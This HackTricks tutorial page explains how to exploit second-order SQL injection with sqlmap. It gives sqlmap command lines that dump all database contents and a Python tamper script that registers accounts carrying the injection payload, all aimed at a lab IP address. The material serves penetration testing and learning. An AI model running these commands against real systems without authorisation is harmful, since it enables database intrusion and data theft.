hacktricks/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md

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# Second Order Injection - SQLMap
**SQLMap can exploit Second Order SQLis.**\
****You need to provide:
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* The **request** where the **sqlinjection payload** is going to be saved
* The **request** where the **payload** will be **executed**
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The request where the SQL injection payload is saved is **indicated as in any other injection in sqlmap**. The request **where sqlmap can read the output/execution** of the injection can be indicated with `--second-url` or with `--second-req` if you need to indicate a complete request from a file.
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**Simple second order example:**
```bash
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#Get the SQL payload execution with a GET to a url
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sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"
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#Get the SQL payload execution sending a custom request from a file
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sqlmap -r login.txt -p username --second-req details.txt
```
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In several cases **this won't be enough** because you will need to **perform other actions** apart from sending the payload and accessing a different page.
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When this is needed you can use a **sqlmap tamper**. For example the following script will register a new user **using sqlmap payload as email** and logout.
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```python
#!/usr/bin/env python
import re
import requests
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def login_account(payload):
proxies = {'http':'http://127.0.0.1:8080'}
cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}
params = {"username":"asdasdasd", "email":payload, "password":"11111111"}
url = "http://10.10.10.10/create.php"
pr = requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
url = "http://10.10.10.10/exit.php"
pr = requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
def tamper(payload, **kwargs):
headers = kwargs.get("headers", {})
login_account(payload)
return payload
```
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A **SQLMap tamper is always executed before starting a injection try with a payload** **and it has to return a payload**. In this case we don't care about the payload but we care about sending some requests, so the payload isn't changed.
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So, if for some reason we need a more complex flow to exploit the second order SQL injection like:
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* Create an account with the SQLi payload inside the "email" field
* Logout
* Login with that account (login.txt)
* Send a request to execute the SQL injection (second.txt)
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**This sqlmap line will help:**
```bash
sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy http://127.0.0.1:8080 --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a
###########
# --tamper tamper.py : Indicates the tamper to execute before trying each SQLipayload
# -r login.txt : Indicates the request to send the SQLi payload
# -p email : Focus on email parameter (you can do this with an "email=*" inside login.txt
# --second-req second.txt : Request to send to execute the SQLi and get the ouput
# --proxy http://127.0.0.1:8080 : Use this proxy
# --technique=U : Help sqlmap indicating the technique to use
# --dbms mysql : Help sqlmap indicating the dbms
# --prefix "a2344r3F'" : Help sqlmap detecting the injection indicating the prefix
# --union-char "DTEC" : Help sqlmap indicating a different union-char so it can identify the vuln
# -a : Dump all
```